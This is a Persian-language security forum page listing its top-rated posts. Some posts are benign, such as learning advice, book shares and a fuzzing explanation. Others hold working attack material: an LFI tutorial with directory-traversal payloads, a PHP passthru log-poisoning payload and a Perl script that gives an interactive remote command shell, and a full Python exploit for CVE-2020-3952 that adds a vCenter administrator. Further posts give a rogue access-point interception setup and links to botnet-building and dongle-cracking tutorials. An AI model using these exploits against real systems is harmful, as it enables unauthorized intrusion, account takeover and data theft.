رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

تخته امتیازات


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۲۰/۰۵/۱۶ در همه بخش ها

  1. 6 امتیاز
    به نام خدای بزرگ با سلام seh یا Structured Exception Handler یک نوع مکانیزم دفاعی برای جلوگیری از حملات overflow هست. زمانی که ما در مرحله ی فازینگ اپلیکیشن قرار داریم یا بهتر بگم در برنامه شکست ایجاد می کنیم. در واقع یک استثنا ایجاد کردیم چون که برنامه انتظار چنین رفتاری رو از قبل نداشت. یا دقیق تر بگم برنامه نویس پیش بینی های لازم امنیتی رو رعایت نکرد. مکانیزم دفاعی seh مانع از ایجاد اینگونه استثناها میشه. برای اینکه موضوع بیشتر قابل درک باشه یه تست ساده با هم انجام میدیم. من از برنامه ی معروف easy chat server برای این کار استفاده می کنم که از این مکانیزم استفاده می کنه. و مناسب کارهای تستی هست و در ورژن های گوناگونی هم وجود داره. حالا یه تیکه کد ساده به زبان روبی برای انجام فازینگ استفاده می کنیم. پروسه ی اجرایی برنامه رو به دیباگر Immunity متصل می کنم. حالا کد خودمون رو اجرا می کنیم. یه نگاه به رجیسترها به خصوص eip می کنم تا ببینم اتفاقی افتاده یا نه؟ همونطور که می بینید seh مانع از رونویسی این رجیستر شده و در واقع اون رو در حافظه ی مجازی خودش ذخیره کرده. که حد فاصل اون تا حافظه ی واقعی خود برنامه 4 بیت یا یک nible هست. البته راههای دور زدن این مکانیزم متعدد هست چون که بالاخره هر چیزی در حافظه دارای یک آدرس و یک نقطه ی ورود هست. (خوشحال میشم از نظرات دوستان استفاده کنم.)
  2. 5 امتیاز
    : نظر شخصی خودم برای کار کردن تو حوزه وب هکینگ اولین و مهم ترین پیش نیازش تسط به زبان های تحت وب هستش تا با نحوه ساختار سایت و شناسایی باگ ها آشنا بشی و خیلی از مفاهیم دیگه مثل دوره های شبکه و دوره هک اخلاقی و انواع راه های هک و تست نفوذ ، ابزار نویسی و کلی راه های دیگه که هر کدوم یه پیش نیازی میخواد و پس راه خیلی طولانی ولی موثری رو طی میکنی ! اینجا خیلی خیلی خلاصه گفتم اما بعدا راجبش یه تاپیک میزنم چون باید کلی راجبش بحث کرد امید وارم به دردت خورده باشه ، و به اون چیزی که میخوای برسی !
  3. 5 امتیاز
    @payam99 با عرض ادب و احترام برای ارزیابی امنیت و پیدا کردن آسیب پذیری متد های مختلف و روش هایی رو باید مورد ازمایش قرار دهید. برای مثال در مورد وبسایت باید وارد زیر مورد بررسی واقع شود: و برای نفوذ به یک وبسایت از چند طریق قابلیت اقدام و نفوذ میباشد: 1- نفوذ به صورت مستقیم از طریق وبسایت 2- نفوذ به صورت غیرمستقیم از طریق وبسایت های مشترک بر روی سرور 3- آنالیز سرور و بررسی ماژول ها و پکیج های نصب شده بر روی سرور اصلی که بخوایم هر مورد رو بصورت کامل بررسی کنیم خیلی طولانی خواهد شد. اما در روش اول شما میتوانید از طریق ابزارهای مختلف یا بصورت Manual شروع به انالیز پارامتر ها - ریکوئست ها - Header ها و تمامی موارد رو مورد بررسی قرار داده و در صورت هرگونه موارد مشکوک اقدام به تست انواع آسیب پذیری های احتمالی کرد. در مورد دوم نیازمند تست تمامی مراحل ذکر شده در یک وبسایت مشترک با سایت هدف میباشد و بعد از پیدا کردن آسیب پذیری و بهروری اسیب پذیری که منجر به گرفتن دسترسی از وبسایت مشترک خواهد شد و سپس اقدام به نفوذ به سرور جهت ایجاد دسترسی از سایت مورد نظر انجام شود. * مقالات استفاده از Acunetix - burp suite هم ببرسی نمایید.
  4. 5 امتیاز
    با سلام. کتاب جدید SQL Injection Strategies خدمت شما عزیزان: سال انتشار 2020 موفق باشید💓 SQL_Injection_Strategies-PDF.rar
  5. 5 امتیاز
    آموزش SQL injection به روش Error Based سوال بود در خدمتم موفق باشيد error_based.rar
  6. 5 امتیاز
    در این سناریو فرد مهاجم توانایی انجام یك حمله MITM بر روی برنامه تلفن همراه آسیب پذیر و سرور پیاده سازی شده را دارد و در ادامه می تواند Rogue Access Point (یا Rogue AP) دلخواه خود را پیکربندی کند. Rogue AP محدوده آنتن دهی شبکه های بی سیم است که شخص مهاجم می تواند بدون دخالت مدیر یا مسئول شبکه با استفاده از دستگاه های بی سیم مورد نظر خود، دسترسی غیرمجاز به زیرساخت های سیم کشی شبکه را برای خود فراهم کند. مهاجم یا مهاجمان می توانند یک شبکه WiFi عمومی (Rogue AP) را در مکانی راه اندازی کنند که افراد زیادی در آنجا از خدمات این گونه زیر ساخت ها استفاده می کنند مانند کافی شاپ یا فرودگاه و ... مهاجم می تواند با استفاده از نام های جعلی مانند "MainStCafe_FreeWiFi" یا "Wi-Fi-Free-Airport" کاربران و مشتریان را فریب داده و ظاهر مشروع به خود بگیرد. متأسفانه اکثر مردم از خطرات اتصال به شبکه های عمومی نا امن آگاه نیستند و به راحتی می توانند در این فرآیند اتصال جعلی فریب بخورند. پس از طی این فرآیندها، مهاجم می تواند ترافیک تلفن شخص قربانی را جمع آوری، رهگیری و ویرایش کند. هنگامی که شخص قربانی در حال مرور صفحه وب می باشد، احتمالاً با اخطاری نظیر عدم احراز هویت روبرو می شود . مرورگرهای وب با استفاده از پروتکل HTTPS قادر به مسدود سازی یا هشدار هستند (اغلب کاربران این خطاها را نادیده می گیرند و بدون فکر روی ‘Continue Anyway’ کلیک می کنند) اما برنامه های دستگاه های iOS می توانند به سادگی از ارسال ترافیک در این سناریوهای مخرب امتناع خودداری کنند. با این حال در برخی موارد ممکن است مهاجم بتواند ترافیک رمز نشده HTTPS را از تلفن قربانی رهگیری کند. همه ما می دانیم که نصب و راه اندازی گواهی CA امری ضروری است و برای ایمن ماندن باید چگونگی اجرای درست SSL را بدانیم. در ادامه با ما همراه باشید .... در این قسمت قصد داریم این تست را روی دستگاه های IOS انجام بدیم. 1. نصب internet Sharing مسیر مورد نظر در مک ==> System Preferences > Sharing’ طبق عکس internet sharing رو جست و جو کرده و تیک آن را بزنید. و سپس وای فای را به رایانه ای که از آن استفاده می کنید وصل کنید. 2. نصب Port Forwarding برای ساخت Port Forwarding ابتدا باید آی پی خودمان را با زدن دستور ifconfig پیدا کنیم. که ای پی من به شکله 192.168.2.1 است. نیاز داریم یک فایل Anchor ایجاد کنیم. با زدن دستور زیر می توانیم فایل را ایجاد کنیم. sudo vi /etc/pf.anchors/rogue متن های زیر را داخل فایلی که ساخته ایم قرار بدین. به جای bridge100 اسم interface خودتان را قرار بدین. rdr pass on bridge100 inet proto tcp from 192.168.2.0/24 to any port http -> 127.0.0.1 port 8080 rdr pass on bridge100 inet proto tcp from 192.168.2.0/24 to any port https -> 127.0.0.1 port 8080 در آخر نیاز داریم فایل جدیدمان را به عنوان کانفیگ دیفالت portforwarding معرفی کنیم. ابتدا فایل کانفیگ را با دستور زیر باز میکنیم. sudo vi /etc/pf.conf نیاز دارید 2 خط کد به این فایل اضافه کنید که به ترتیب زیر قرار دهید. rdr-anchor "rogue" load anchor "rogue" from "/etc/pf.anchors/rogue" این کانفیگ ها را به اخرین خط فایل کانفیگتان اضافه کنین. وقتی ترافیک AccessPoint را به سمت BUrpsuite فروارد کردیم، Burp تلاش می کند حمله MITM را انجام دهد. بعد از راه اندازی burpsuite، به قسمت پروکسی رفته و طبق تصویر پروکسی را راه اندازی کنید. 3. اکسپلویت در آیفون، شما باید بتوانید به وای فای جدید متصل شین. قبل از هرچیزی اگر قبلا Port Swigger CA را نصب کرده بودید آن را از دستگاه خودتان حذف کنین. وقتی در گوشی ایفون خود وبسایتی باز کنین و وب گردی کنین می توانین اطلاعات رهگیری و جمع آوری شده خودتان را در Burpsuite ببینین.
  7. 5 امتیاز
    با عرض احترام تشکر بابت مطالب مفیدتون لطف میکنید تمامی ابزار و کد هایی که بصورت Screen قرار دادید اگر فایل هستند پیوست کنید و یا از تگ کد استفاده کنید؟ و اگر لازم هست بخشی مبنی بر فازینگ و ... در انجمن لحاض گردد بصورت پیام خصوصی در ارتباط باشید.
  8. 4 امتیاز
    با سلام در راستای Booster File upload : <script src="https://s3-eu-west-1.amazonaws.com/boostera.assets/boostera.umd.js"></script> <script>  const options = {   uploadFinishedCallback: (info) => {console.log(info)},  }  const boostera = BoosteraUploadWidget(options); </script> HTML FILE PICKER. در صرافی های ایرانی نیز دیده شده است. 2020_Shell_Upload.zip
  9. 4 امتیاز
    بانک میزنیم Ruiner-iran-cyber.zip
  10. 4 امتیاز
    با سلام خدمت دوستان عزیز. یکی از راه هایی که که برای محاظت از نرم افزار انجام میدن استفاده از دانگل ها هستش.😒 تو این مجموعه سری آموزش با نحوه کرک کردن انواع دانگل های سخت افزاری آشنا میشید.😬 لینک دانلود: https://mega.nz/file/kypjyRja#F4D4T183WeyEG2_bu_nI_bfu3P7DoW-k55XdEvlYWeA رمز فایل: [email protected] موفق و سر بلند باشید 💚
  11. 4 امتیاز
    با سلام خدمت استاد عزیز . این برنامه به کمک متغیر های که براش تعریف شده مقدار بالانس بیت رو بهمون نشون میده ، فقط به دوستان پیشنهاد میکنم کسانی که از این برنامه میخوان استفاده کنن اینتیجر برنامه رو عوض کنن که مقدار بالانس رو به صورت x/yz نشون بده . محیط خروجی برنامه
  12. 4 امتیاز
    با سلام. کتاب جدید آموزش برپ سویت خدمت شما عزیزان:🍀 A Complete Guide to Burp Suite: Learn to Detect Application Vulnerabilities Pages: 175 Format: PDF Size: 10.1 MB Language: English Publication: 2021 موفق باشید: BurpSuite2021.rar
  13. 4 امتیاز
    سلام. این موضوعی که شما عرض کردید خیلی کلی هستش... شما اول باید باید مشخص کنید تو کودوم از شاخه هکینگ علاقه دارید. بعدش یه رود مپ برای اینکار در نظر گرفته میشه...! تو پیغام خصوصی براتون یه لینک برای این موضوع فرستادم
  14. 4 امتیاز
    فیلم رو ضمیمه کرده بودم. چون حجمش زیاد بودش قبلا در آپلود سنتر دیگه ای آپلود کردم. متاسفانه پاک شدش... در حال حاضر دسترسی به محتوای اونها ندارم.در اولین فرصت دوباره اونو پیدا می کنم و دوباره براتون میزارم.
  15. 4 امتیاز
    Local File Inclusion گنجاندن پرونده محلی (LFI) زمانی است که می توانید با استفاده از دایرکتوری ، سرور را مرور کنید. یکی از رایج ترین کاربردهای LFI کشف پرونده / etc / passwd است. این پرونده حاوی اطلاعات کاربر یک سیستم لینوکس است. هکرها سایتهایی را که نسبت به LFI آسیب پذیرند ، آسیب پذیر می دانند. بیایید بگوییم هکر یک سایت آسیب پذیر ، www.target-site.com/index.php?p=about را پیدا کرده است ، با استفاده از دایرکتوری ، سعی می کند به دنبال پرونده / etc / passwd باشد: www.target-site.com/index.php?p= ../../../../../../../etc/passwd شما یک فهرست را می آورید و میزان استفاده شما بستگی به جایی دارد که سرور شما در آن قرار دارید با مقایسه فایل / etc / passwd. اگر هکر بتواند با موفقیت به پرونده / etc / passwd دسترسی پیدا کند ، لیستی شبیه به لیست زیر می بیند. Root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt هر خط به هفت قسمت تقسیم می شود: username:passwd:UserID:GroupID:full_name:directory:shell در صورت نمایش هش رمز عبور ، هکر قادر به ترک کردن آن و دسترسی به دستگاه است ، اما در مورد ما رمز عبور نشان داده نمی شود. این بدان معنی است که رمز عبور سایه زده شده است و در پرونده / etc / سایه ای که هکر به آن دسترسی ندارد. در این صورت ، هکر احتمالاً سعی می کرد از طریق تزریق ورود به سیستم به روش دیگری دسترسی پیدا کند. دایرکتوری های log در مناطق مختلف در توزیع های مختلف لینوکس قرار دارند. در زیر لیستی از رایج ترین مکان ها آمده است. ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_log ../../../../../../../usr/local/apache/logs/access.log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_log ../../../../../../../usr/local/apache/logs/error.log ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log در زیر مراحلی که یک هکر برای دسترسی به سیستم از طریق تزریق ورود به سیستم انجام می دهد ، آورده شده است. 1. ابتدا هکر پیدا می کند که سرور هدف چه نسخه ای از سیستم عامل را اجرا می کند و سپس مکان های پرونده های موجود در آن سیستم عامل را جستجو می کند. 2. در مرحله بعد ، هکر از طریق LFI به آن مکان حرکت می کند. اگر او با یک دسته از سیاهها نمایش داده شود ، ممکن است او ادامه یابد. 3- هکر با تایپ کردن مقداری کد PHP را در سیاههها تزریق می کند <؟ Passthru ($ _ GET [‘cmd '])؟> پس از = در URL. این باعث می شود که اسکریپت PHP وارد شود زیرا هیچ فایلی با آن نام وجود ندارد. آنچه این اسکریپت انجام خواهد داد دسترسی به پوسته هکر است و به وی اجازه می دهد دستورات سیستم را اجرا کند. 4- اکنون اگر هکر به پرونده log برگردد ، می بیند که اسکریپت PHP او تجزیه نشده و در عوض تبدیل به ٪ 3C؟٪ 20passthru ($ _ GET [cmd])٪ 20؟٪ 3E 5- هنگام ارسال اسکریپت ، مرورگر به طور خودکار URL را رمزگذاری می کند. خوشبختانه یک فیلم نامه مروارید وجود دارد که می تواند این مشکل را برطرف کند. در زیر اسکریپت مروارید ، متغیرها را ویرایش کنید: $ $ ، مسیر $ ، کد $ ، و log $ را وارد کنید اطلاعات مناسب #!/usr/bin/perl -w use IO::Socket; use LWP::UserAgent; $site=”www.vulnerablesite.com”; $path=”/”; $code=”<? Passthru(\$_GET[cmd]) ?>”; $log = “../../../../../../../etc/httpd/logs/error_log”; print “Trying to inject the code”; $socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die “\nConnection Failed.\n\n”; print $socket “GET “.$path.$code.” HTTP/1.1\r\n”; print $socket “User-Agent: “.$code.”\r\n”; print $socket “Host: “.$site.”\r\n”; print $socket “Connection: close\r\n\r\n”; close($socket); print “\nCode $code successfully injected in $log \n”; print “\nType command to run or exit to end: “; $cmd = <STDIN>; while($cmd !~ “exit”) { $socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die “\nConnection Failed.\n\n”; print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$cmd HTTP/1.1\r\n”; print $socket “Host: “.$site.”\r\n”; print $socket “Accept: */*\r\n”; print $socket “Connection: close\r\n\n”; while ($show = <$socket>) { print $show; } print “Type command to run or exit to end: “; $cmd = <STDIN>; } هنگامی که هکر این اسکریپت را اجرا کرد و با موفقیت پیش رفت ، وی قادر به اجرای هر دستوری روی سرور خواهد بود. از اینجا او می تواند هر گونه سوء استفاده محلی را برای دستیابی به ریشه اجرا کند یا فقط پرونده های سرور را مرور کند.
  16. 4 امتیاز
    آسیب پذیری از Vmware vCenter : VMware vCenter Server 6.7 - Authentication Bypass چندی پیش آسیب پذیری از Vmware vCenter ورژن 6.7 کشف و اعلام شد . با بهره از این آسیب پذیری امکان دورزدن احراز هویت ( Authentication Bypass ) در Vmware vCenter Server میباشد. دراصطلاح هکر با قادر است یک حساب کاربری با سطح دسترسی Administrator اضافه کند و علت این آسیب پذیری که حساس هم هست دو دلیل داره : 1- خطا و ایراد در سیستم بررسی سطح درسترسی ها و مجوزها 2- خطا در LDAP که امکان و مجوز بدون احرازهویت را میدهد. V 6.7 : # Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass # Date: 2020-06-01 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html # Version: vCenter Server 6.7 before update 3f # Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) # CVE: CVE-2020-3952 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 File name CVE-2020-3592.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: exploit + vulnerability checker ''' import binascii, socket, sys, string, random ## Default vars; change at will _sIP = '192.168.50.35' _iPORT = 389 _iTIMEOUT = 5 def randomString(iStringLength=8): #sLetters = string.ascii_lowercase sLetters = string.ascii_letters return ''.join(random.choice(sLetters) for i in range(iStringLength)) def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed sReturn = sPrefix if (len(sData) / 2 ) > 255: sReturn += b'82' hexBytes = 2 elif (len(sData) /2 ) >= 128: sReturn += b'81' sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() return sReturn def buildBindRequestPacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) ## Packet Construction sPacket = getLengthPrefix(sPass, b'80') + sPass sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket sPacket = b'020103' + sPacket sPacket = getLengthPrefix(sPacket, b'60') + sPacket sPacket = b'020101' + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildUserCreatePacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) def createAttribute(sName, sValue): sValue = getLengthPrefix(sValue, b'04') + sValue sName = getLengthPrefix(sName, b'04') + sName sReturn = getLengthPrefix(sValue, b'31') + sValue sReturn = sName + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn def createObjectClass(): sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') sReturn = getLengthPrefix(sReturn, b'31') + sReturn sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn ## Attributes sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) sAttributes += createObjectClass() sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) ## CN sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') sUserEntry = getLengthPrefix(sCN, b'04') + sCN ## Packet Assembly (bottom up) sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes sPacket = sUserEntry + sPacket sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildModifyUserPacket(sUser): sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') sMember = binascii.hexlify(b'member') ## Packet Construction sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN sPacket = getLengthPrefix(sPacket, b'31') + sPacket sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def performBind(s): ## Trying to bind, fails, but necessary (even fails when using correct credentials) dPacket = buildBindRequestPacket('[email protected]','www.IC4.be') s.send(dPacket) sResponse = s.recv(1024) try: sResponse = sResponse.split(b'\x04\x00')[0][-1:] sCode = binascii.hexlify(sResponse).decode() if sCode == '31': print('[+] Ok, service reachable, continuing') else: print('[-] Something went wrong') except: pass return sCode def performUserAdd(s, sUser, sPass): dPacket = buildUserCreatePacket(sUser,sPass) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) elif sCode == b'\x32': print('[-] Error, this host is not vulnerable (insufficientAccessRights)') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() print('[-] Error, user not added, message received: ' + sMessage) except: pass return sCode def performUserMod(s, sUser, verbose = True): dPacket = buildModifyUserPacket(sUser) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': if verbose: print('[+] User modification success (if the above is OK).') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() if verbose: print('[-] Error during modification, message received: ' + sMessage) except: pass return sCode, sMessage def performUnbind(s): try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') except: pass def main(): global _sIP, _iPORT, _iTIMEOUT _sUSER = 'user_' + randomString(6) _sPASS = randomString(8) + '_2020' bAdduser = False if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) print(' Leave username & password empty for a vulnerability check') print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') if not sAnswer == '': _sIP = sAnswer sAnswer = input('[?] Want to perform a check only? [Y/n]: ') if sAnswer.lower() == 'n': bAdduser = True if bAdduser: sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') if not sAnswer == '': _sUSER = sAnswer sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') if not sAnswer == '': _sPASS = sAnswer else: _sIP = sys.argv[1] if len(sys.argv) >= 3: _sUSER = sys.argv[2] bAdduser = True if len(sys.argv) >= 4: _sPASS = sys.argv[3] ## MAIN print('') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(_iTIMEOUT) try: s.connect((_sIP,_iPORT)) except: print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') sys.exit(1) performBind(s) if bAdduser: sCode = performUserAdd(s, _sUSER, _sPASS) if not bAdduser: print('[!] Checking vulnerability') sCode, sMessage = performUserMod(s, 'Administrator', False) if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) else: print('[+] This host is vulnerable!') else: sCode = performUserMod(s, _sUSER) performUnbind(s) s.close() if __name__ == "__main__": main()
  17. 3 امتیاز
    سلام دوستان آرین چهرقانی هستم امروز با تحلیل آسیب پذیری Remote Code Execution از شل آلفا ( Tesla v4.1 ) درخدمت شما دوستان عزیز هستم. خب ، ما یه دوستی داشتیم که برامون یه شل از یه سروری فرستاد تا روش کار کنیم و تست بزنیم ... متاسفانه هیچ رمزی روی شل نبود و بعد از یکی دو روز که گذشت یا این دوست ما یا هرکسی دیگه ای اومد و رمز گذاشت روی شل و دسترسی ما رو یه جورایی قطع کرد ، درواقع شل خودش رو اپلود کرد و هیچ بکدوری هم درکار نبود. من برام قابل قبول نبود که یکی از در بیاد و دسترسی رو ازم بگیره ، برای همین رفتم سراغ شل دوست داشتنی و معروف آلفا تا یکمی هم انالیز کنم کداش رو هم اینکه یه راهی برای دور زدن رمز یا یه همچین چیزی پیدا کنم ، ( جدا از این بحث باید یادآور باشم ، این شل امسال توسط دوست عزیزم آقا سجاد مدیر کانال بیسکویت پدر | Biskooit Pedar دیکد شد و پخش شد ) خب دوستان ما توی ورژن های قبلی و ورژن جدید شل یک دایرکتوری رو مشاهده میکنیم با نام : ALFA_DATA البته تو ورژن های قبلی یا نبود یا یک اسم دیگه ای داشت ، داخل این دایرکتوری یک دایکتوری دیگه ای به نام alfacgiapi وجود داره و معمولا سه تا فایل داخلش قرار میگیره با نام های : bash.alfa & perl.alfa & py.alfa و این 3 فایل آسیب پذیر هستند . داخل این فایل ها با متد POST یک پارامتری با نام CMD گرفته شده که ورودی تبدیل شده از base64 رو دیکد میکنه و میره سمت سرور میخونه دستور رو ، و اونم به ما توی صفحه خروجی خودش رو برمیگردونه . ALFA TEAM SHELL TESLA 4.1 - Remote Code Execution (Unauthenticated) خب همینطور که تو تصویر مشاهده میکنید ما تونستیم دستورات خودمون رو به راحتی اجرا کنیم و شل خودمون اپلود کنیم. در نهایت هم اینو ثبت کردم که شما میتونید با این لینک بهش دسترسی داشته باشید : https://cxsecurity.com/issue/WLB-2021120083 امیدوارم که لذت برده باشید دوستان عزیزم 🌹 "با تشکر از گروه امنیتی ایران سایبر"
  18. 3 امتیاز
    فیلم آموزش ساخت بات نت به صورت کامل فقط لایک کامنتیادتون نره از ما حمایت کنید https://mega.nz/file/rJoDhSRC#IEHfyiINMTY2myrNcqkIO-bqUi7ndofLCn1DwtI38iI
  19. 3 امتیاز
    آسیب پذیری Remote Code Execution کشف شده از روتر های Seowon 130-SLC که توسط ( مبین نت | mobinet ) داره استفاده میشه این دفعه یه جور دیگه ای خودشو نشون داد ! در حال تست روتر بودم و متوجه شدم که بدون احراز هویت روی یکی از پارامتر های دیتای ارسالی ("queriesCnt" ) میشه دستوراتی رو وارد کرد و پاسخ رو با قالب xml در مروگر بدون احراز هویت ( admin ) دریافت کرد ! ارسال درخواست به سمت ip هدف و دریافت خروجی xml در مروگر همینطور که تو عکس بالا مشاهده میکنید من ip و port یکی از روتر ها رو اوردم و با متد Post این دیتا رو ارسال کردم و سمت چپ عکس ، هدف به من خروجی داده <xml> <log>uid=0(root) gid=0(root) </log></xml> در نهایت هم اینو ثبت کردم که شما میتونید با این لینک بهش دسترسی داشته باشید : https://www.exploit-db.com/exploits/50295 شناسه هایی با عنوان دسترسی ریموت برای این روتر ها ثبت شده که در دسترس هستند : https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-17456 امیدوارم که لذت برده باشید دوستان عزیزم 🌹 "با تشکر از گروه امنیتی ایران سایبر" نویسنده : آرین چهرقانی | Aryan Chehreghani
  20. 3 امتیاز
    بسم الله الرحمن الرحیم با سلام در این پست با اموزش Web Flag Simple SQL injection ابتدا بررسی میکنیم که به کوکی ها دسترسی داشته باشیم مقدار کلیدی مورد نیاز ما در برنامه اختصاص داده شده است که متغیر است <?php error_reporting(0); include_once("flag.php"); $cookie = $_COOKIE['ISecer']; if(isset($_GET['hint'])){ show_source(__FILE__); } elseif (unserialize($cookie) === "$KEY") { echo "$flag"; } else { ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Login</title> <link rel="stylesheet" href="admin.css" type="text/css"> </head> <body> <br> <div class="container" align="center"> <form method="POST" action="#"> <p><input name="user" type="text" placeholder="Username"></p> <p><input name="password" type="password" placeholder="Password"></p> <p><input value="Login" type="button"/></p> </form> </div> </body> </html> <?php } $KEY='ISecer:www.isecer.com'; ?> پس از تجزیه و تحلیل ، کوکی مورد نیاز برای ضدعفونی شدن برابر مقدار KEY است و سپس می توان پرچم را نشان داد. ابتدا یک قطعه کد php بنویسید ، سعی کنید KEY بعد از سریال سازی یک روش مبهم سازی بسیار قوی پیدا کنید نرم افزار Phpstudy را باز کرده _ ( وظیفه اصلی این نرم افزار ایجاد وب سایت با فایل php است ) فقط این فایل برنامه نویسی را مستقیماً در فهرست اصلی قرار دهید ، اکنون می توانید کوکی ها را مستقیماً وارد کنید. از Burp Suite استفاده کنید ، در ( Send to Repeater ) مقدار کوکی را وارد کنید ، پرچم 